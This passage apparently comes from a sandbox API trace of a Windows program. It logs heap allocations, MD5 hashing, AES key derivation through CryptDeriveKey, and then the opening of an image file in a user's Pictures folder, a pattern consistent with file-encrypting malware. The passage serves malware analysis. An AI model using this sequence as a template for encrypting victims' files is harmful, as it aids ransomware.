(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.261] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.261] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.261] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.261] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.261] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.261] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.262] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.262] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.262] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0189.262] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.262] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.266] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.266] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.266] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.267] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.268] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.268] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.269] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.269] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.270] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0189.270] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.270] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0189.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.270] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.271] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0189.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.271] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.272] CryptDestroyHash (hHash=0x90af58) returned 1 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.272] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.272] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.272] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.272] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\evgfmja.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.274] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.274] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0189.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.274] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.275] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.275] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.275] RtlAllocateHeap (HeapHandle=0x8a0000, 